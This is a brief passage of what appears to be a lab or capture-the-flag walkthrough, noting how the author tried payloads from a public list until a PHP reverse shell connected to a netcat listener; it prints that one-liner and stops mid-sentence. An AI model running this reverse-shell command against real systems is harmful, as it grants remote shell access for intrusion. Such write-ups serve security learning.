Payloadallthethings

  • I decided to go through the list to see if something would work.

  • Nothing seemed to get a response until I started trying the php payloads.

  • Finally I got one to work on a netcat listener:

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
  • Once I have access to the computer, I will search through it.

  • There is nothing in the current directory so

Last updated